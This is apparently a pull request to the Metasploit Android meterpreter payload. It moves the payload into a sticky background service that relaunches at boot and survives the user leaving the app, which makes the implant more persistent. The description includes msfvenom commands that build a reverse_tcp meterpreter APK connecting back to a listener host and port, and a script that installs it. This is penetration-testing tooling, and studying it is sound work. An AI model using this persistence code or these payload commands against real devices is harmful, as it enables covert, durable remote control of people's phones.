### PR TITLE
Running Android payload within a Service

### DIFF
--- a/java/androidpayload/app/src/com/metasploit/stage/MainActivity.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/MainActivity.java
@@ -1,13 +1,14 @@
 package com.metasploit.stage;
 
 import android.app.Activity;
+import android.content.Intent;
 import android.os.Bundle;
 
 public class MainActivity extends Activity {
     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
-        Payload.start(this);
+        startService(new Intent(this, MainService.class));
         finish();
     }
 }

--- a/java/androidpayload/app/src/com/metasploit/stage/MainBroadcastReceiver.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/MainBroadcastReceiver.java
@@ -9,7 +9,7 @@ public class MainBroadcastReceiver extends BroadcastReceiver {
     @Override
     public void onReceive(Context context, Intent intent) {
         if (Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())) {
-            Payload.start(context);
+            context.startService(new Intent(context, MainService.class));
         }
     }
 }

--- a/java/androidpayload/app/src/com/metasploit/stage/MainService.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/MainService.java
@@ -1,0 +1,20 @@
+package com.metasploit.stage;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
+
+public class MainService extends Service {
+
+    @Override
+    public IBinder onBind(Intent intent) {
+        return null;
+    }
+
+    @Override
+    public int onStartCommand(Intent intent, int flags, int startId) {
+        Payload.start(this);
+        return START_STICKY;
+    }
+
+}

--- a/java/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -177,6 +177,7 @@ public class Payload {
         myClass.getMethod("start",
                 new Class[]{DataInputStream.class, OutputStream.class, String[].class})
                 .invoke(stage, in, out, parameters);
-        System.exit(0);
+
+        session_expiry = -1;
     }
 }

--- a/java/androidpayload/app/src/main/AndroidManifest.xml
+++ b/java/androidpayload/app/src/main/AndroidManifest.xml
@@ -57,6 +57,8 @@
                 <action android:name="android.intent.action.BOOT_COMPLETED" />
             </intent-filter>
         </receiver>
+
+        <service android:name=".MainService"/>
     </application>
 
 </manifest>


### PR DESCRIPTION
This change attempts to make the Android meterpreter more resilient. Currently we only launch an activity, which means if the user navigates away from the activity, the ActivityManager sometimes kills the process, e.g: ```I/ActivityManager( 3537): Killing 5207:com.metasploit.stage/u0a217 (adj 15): empty #31```
After this change the payload should be less likely to be killed while running in the background.
Test plan requires a little patience:
 - [x] Get a normal Android meterpreter session with msfvenom e.g:
```
./msfvenom -p android/meterpreter/reverse_tcp -f raw LHOST=127.0.0.1 LPORT=4444 > android.apk
./tools/exploit/install_msf_apk.sh android.apk
```
 - [x] Use the phone while testing the session. The OS may still kill the session but this change should make that less likely to happen.